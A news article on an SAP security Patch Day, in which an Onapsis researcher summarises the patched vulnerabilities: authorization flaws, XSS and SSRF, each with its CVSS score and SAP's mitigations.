SAP , the German multinational software company, develops enterprise software to manage business operations and customer relations. The company has a large reach, being the world’s leading enterprise resource planning software vendor.
This means any security updates with SAP tend to carry significant interest from the IT departments in many businesses. With the latest round of security patches, SAP has released eighteen new and updated SAP security patches, including two so-termed ‘High Priority Notes’.
How effective will these updates be? SAP Security Researcher Thomas Fritsch thinks they will be and his work with Onapsis Research Labs (ORL) directly contributed to SAP’s Patch Day in patching twelve vulnerabilities covered by the ten new SAP Security Notes.
Fritsch has explained what each of these updates means.
SAP Security Note #3483344, tagged with a CVSS score of 7.7
Fritsch says that this is the most critical patch, based on CVSS rating. The Onapsis Research Labs (ORL) detected a Missing Authorization Check vulnerability in SAP Product Design Cost Estimating (SAP PDCE) which is based on the SAP Strategic Enterprise Management (SEM). A remote-enabled function module in SAP PDCE allows a remote attacker to read generic table data and thus poses the system’s confidentiality at high risk. The patch disables the vulnerable function module.
SAP Security Note #3490515, tagged with a CVSS score of 7.2
Fritsch explains that this addresses an Improper Authorization Check vulnerability in SAP Commerce (On Premise and Public Cloud). An attacker can misuse the forgotten password functionality to gain access to a site for which early login and registration is activated, without requiring the merchant to approve the account beforehand. If the site is not configured as an isolated site, this can also grant access to other non-isolated early login sites, even if registration is not enabled for those other sites.
SAP rates the possible impact of this vulnerability on the application’s Confidentiality and Integrity with Low and sees no impact on its availability. As a temporary workaround, SAP recommends disabling registration for affected isolated Composable Storefront B2B sites and for all non-isolated Composable Storefront B2B sites if Early Login is enabled on at least one of these non-isolated sites.
SAP Security Note #3482217 patches a Reflected XSS vulnerability(CVSS score 6.1) and a Stored XSS vulnerability (CVSS score 5.4) in SAP BW Business Planning and Simulation.
With these two, Fritsch says they both have a low impact on the application’s confidentiality and integrity and no impact on its availability.
SAP Security Note #3468681, tagged with a CVSS score of 6.1, targets the XMLEditor in SAP NetWeaver Knowledge Management.
Due to insufficient encoding of user-controlled input, the XMLEditor allows malicious scripts to be executed in the application, according to Fritsch.
SAP Security Note #3467377 is a collective note for SAP CRM (WebClient UI), patching four vulnerabilities in total.
For this, Fritsch outlines that beside two Reflected XSS vulnerabilities, both tagged with a CVSS score of 6.1, it also fixes a Server-Side Request Forgery vulnerability (CVSS score 5.0) and a Missing Authorization Check vulnerability (CVSS score 4.3).
